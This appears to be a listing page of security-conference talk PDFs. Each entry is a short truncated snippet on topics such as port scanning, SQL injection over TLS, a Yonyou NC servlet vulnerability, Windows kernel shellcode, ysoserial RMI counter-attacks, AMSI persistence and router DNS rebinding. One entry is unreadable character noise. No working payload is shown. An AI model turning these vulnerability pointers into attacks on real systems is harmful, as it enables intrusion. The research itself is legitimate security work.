PortBunny A kernel-based port-scanner Copyright © 2007 Recurity Labs GmbH Copyright © 2007 Recurity Labs GmbH Copyright © 2007 Recurity Labs GmbH Copyright © 2007 Recurity Labs GmbH A Port Scanner? *Yawn* Port scanning is fun for most people Needs random scanning Needs 1337 output Needs 23 different scanning types ...
pdf
Hack the hackers: Leaking data over SSL/TLS Ionut Cernica Table of contents Introduction Scenarios and Challanges Blind Injection Problem Blind Injection over SSL/TLS 01 03 02 04 Demo Time – sqlmap Conclusion 05 06 whoami Security Researcher @Future Networks 5G Lab PhD Student @Department of Computer Science CTF P...
pdf
漏洞点:/servlet/FileReceiveServlet 根据web.xml 向导,查看对应servlet的映射。 /service/* 和 /servlet/* 都对应nc.bs.framework.server.InvokerServlet 类 其类在/yonyou\home\lib\fwserver.jar 包内 其servlet的doGet和doPost方法都指向doAction方法 这里直接看doAction方法就可以了 这里主要是根据request.getPathInfo()的值获取了对应的moduleName和 serviceName 最终将值传递给了getServiceObject方法 其getServiceO...
pdf
Windows_Kernel_Shellcode _Exploit chrO.ot Nanika Summary • What is Exploit • Windows_Shellcode • Windows_Kernel_shellcode • CreateRemoteThread backdoor “byshell” • Exploit Demo • 0day_exploit What is Exploit • Buffer overflow • Heap overflow • Format string • CGI or SQL inject Buffer overflow STACK ---------------- Lo...
pdf
闲来无事,反制ysoserial ( 之前分析RMI的时候,发现对于客户端的反序列化攻击都是没有被修复的,也就是说如果调用了原生jdk 的rmi客户端相关调用,连接恶意JRMP服务端就会触发反序列化。 攻击客户端的场景不多,除了反打服务器,打真正客户端的场景可能就是反制了,或者叫蜜罐也行。那 么看下常见的攻击RMI的安全工具有没有这种问题。 ysoserial 上来看看Java安全神器ysoserial里和RMI有关的exp。yso里面大部分都是本地生成payload,但也有一 些打远程服务的,比如RMIRegistryExploit public static void main(final String[] args...
pdf
Forward-Looking Statement Disclaimer This presentation may contain forward-looking statements under applicable securities laws. All statements other than statements of historical fact are forward-looking statements. Forward-looking statements are based on information available to Jamf at the time they are made and...
pdf
2005 July 16 Copyright alan@chroot.org 1 Internet Threats in Depth Phishing and Botnet Alan HIT 2005 2005 July 16 Copyright alan@chroot.org 2 Outline Phishing (20 min) Botnet (40 min) 2005 July 16 Copyright alan@chroot.org 3 What is Phishing? Phishing attacks use both social engineering and technical subterfuge to...
pdf
                      !  " # $ % & ' ( % ) * + , - * - . / 0 / 1 2 . . 2 / - 3 4 2 5 / 6 - 7 / / 2 3 8 1 / - 2 4 3 2 4 / 9 0 5 - : ; < = > ? @ A B C D E F G H I J K L MN O P Q Q Q R S T T U V W H I X Y Z W [ \ K I Y ] ^ _ I Y F W H L E ` L K _ a F _ b a L L E F H E c _ N L d a F _ b a L L E I Y ...
pdf
Ticket to trouble MifareClassic, The Dutch Transportation Card and Access Control  From the Netherlands  Self proclaimed geek  First program at age 5  Focus on security, privacy  Journalist, trainer/consultant  Following Mifare Classic from day one  Wanna know more? Beer makes me talk! Everyone has the right to ...
pdf
EtherSniff EtherSniff How to stealthily monitor an How to stealthily monitor an established Ethernet network established Ethernet network by Mark Smith, aka Smitty Introduction Introduction Hardwired network paths are secure. Hardwired network paths are secure. No encryption needed internally. No encryption needed ...
pdf
1200 EIGHTEENTH STREET, NW WASHINGTON, DC 20036 TEL 202.730.1300 FAX 202.730.1301 WWW.HARRISWILTSHIRE.COM ATTORNEYS AT LAW March 14, 2007 Via Electronic Filing Ms. Marlene H. Dortch, Secretary Federal Communications Commission 445 12th Street, SW Washington, DC 20554 Re: Notice of Ex Parte Communication,...
pdf
Aaron Bayles DC101 @ DEF CON 22 19 years in IT/Infosec Worked in Oil & Gas (O&G) last 8 years Along the way Penetration testing Vulnerability assessment Network architecture, design & implementation Risk assessment Legacy equipment/comms Remote (geographic) connectivity Availability, not confident...
pdf
How I Hacked facebook Again! by Orange Tsai Orange Tsai • Principal security researcher at DEVCORE • Captain of HITCON CTF team • 0day researcher, focusing on Web/Application security orange_8361 Infiltrating Corporate Intranet Like NSA Pre-auth RCE on Leading SSL VPNs Orange Tsai (@orange_8361) Meh Chang (@mehqq_) U...
pdf
1 The Death of Cash The Death of Cash The Loss of Anonymity and Other Dangers of Modern Financial Systems Defcon 16 Las Vegas 2008 2 Agenda Agenda Introduction Bold Claims Why “THEY” Hate Cash Utopian and Dystopian Versions of the Cash Free Society CTRs and SARs Other Regulations Regarding Cash The Liquidity Dan...
pdf
Alice and Bob are Really Confused David Huerta - DEF CON 23 Photo credit: Robert Young such crypto parties wow nyc much codes so cypherpunks very google trolling many credits: Atsuko Sato Alice wants to talk to Bob, but Eve is being nosey. Alice hears about crypto, goes to a crypto party to learn how to crypto. Sec...
pdf
#BHUSA @BlackHatEvents IAM Whoever I Say IAM Infiltrating Identity Providers Using 0Click Exploits Steven Seeley of 360 Vulnerability Research Institute #BHUSA @BlackHatEvents Information Classification: General > whoami Focusing on Web, Application & Cloud 0-day Research: • Security Researcher for 360 Vulnerability R...
pdf
Remote Attacks Against SOHO Routers 08 February, 2010 Craig Heffner Abstract This paper will describe how many consumer (SOHO) routers can be exploited via DNS re-binding to gain interactive access to the router's internal-facing Web based administrative interface. Unlike other DNS re-binding techniques, this att...
pdf
360企业安全(360威胁情报中心) BGP安全之殇 演讲人:张玉兵(Eric) 2 0 1 8 引言 BGPv4安全缺陷是全球互联网现存 最大最严重的安全漏洞 PART 01 关于BGP 目录 CONTENTS PART 02 5个经典BGP安 全事件 PART 03 关于BGP的那些 安全缺陷/漏洞 PART 04 检测 and 防御 01 02 03 04 05 PART 05 BGP,AT&T and NSA I’m the BGP protocol.At least so far,nothing is as irreplaceable as me, PART 01 关于BGP BGP(RFC 1771、RFC 4271)...
pdf
Let’s talk about SOAP, baby. Let’s talk about UPnP. Ricky “HeadlessZeke” Lawshae – DEFCON 23 Who am I? • Security Researcher for HP TippingPoint’s DVLabs team • At Rapid7 before that, and BreakingPoint before that • Speaker at Defcon, Recon, Insomni’hack, and Ruxcon • Voider of warranties • Reader of comic books • D...
pdf
Franz Payer Tactical Network Solutions http://cyberexplo.it Acknowledgements q  Zachary Cutlip q  Craig Heffner q  Tactical Network Solutions Special Thanks q  Ronald Jenkees §  Independent artist §  http://www.ronaldjenkees.com Legal q  EFF (www.eff.org) q  DMCA (Digital Millennium Copyright Act) ...
pdf
原⽂链接,我做个复现. https://b4rtik.github.io/posts/antimalware-scan-interface-provider-for-persistence/ <https://b4rtik.github.io/posts/antimalware-scan-interface-provider-for-persistence/> https://twitter.com/netbiosX/status/1282051493676417028 <https://twitter.com/netbiosX/status/1282051493676417028> 出现错误的话. 试试 然后效果就是这样 ...
pdf
Unbootable Exploiting the PayLock SmartBoot Vehicle Immobilizer what is a boot? old school PayLock SmartBoot What Do I Do After My Car Gets Booted? by NYC Department of Finance well… how else can I remove it? the wrong way the wrong way the wrong way Reverse Engineering the PayLock SmartBoot disassembly [insert disass...
pdf
主办方 赞助商 多元化新零售业务安全防护 —— 瑞数动态安全超融合解决方案 瑞数信息 吴剑刚 3 应用变化 API应用 APP应用 Web应用 微信/小程序 Web攻击防护 APP/API防护 微信/小程序防护 全应用融合防护 需求变化 随着数字化业务深化,导致应用安全防护需求不断升级 组合攻击 自动化攻击 人工渗透 手段变化 0day漏洞 已知漏洞 业务威胁 威胁变化 规则防护 安全联防 主动防御 理念变化 4 注:数据来源《瑞数信息Bots自动化威胁报告》 5 App/JSON 6% App/XML 26% Text/XML 14% Text/HTML 54% API访问流量占比46% App/JSON 69% Text/XML...
pdf
DEFCON 16: How to evade geospatial intrusion detection techniques Ryan W. Trost Agenda • GIS • Geospatial Intrusion Detection implementations • Geospatial Intrusion Detection methodology • Accuracy of IP -> lat/long translation • Okay…so how do I beat it? • Q&A 2 GIS • GIS (Geographic Information Systems): computer...
pdf
1 Overview What is Razorback? 3 Razorback Is… ● An Open Source framework (GPLv2) to enable advanced processing of data and detection of events ● Able to get data as it traverses the network ● Able to get data after it’s received by a server ● Able to perform advanced event correlation ● …Our answer to an ev...
pdf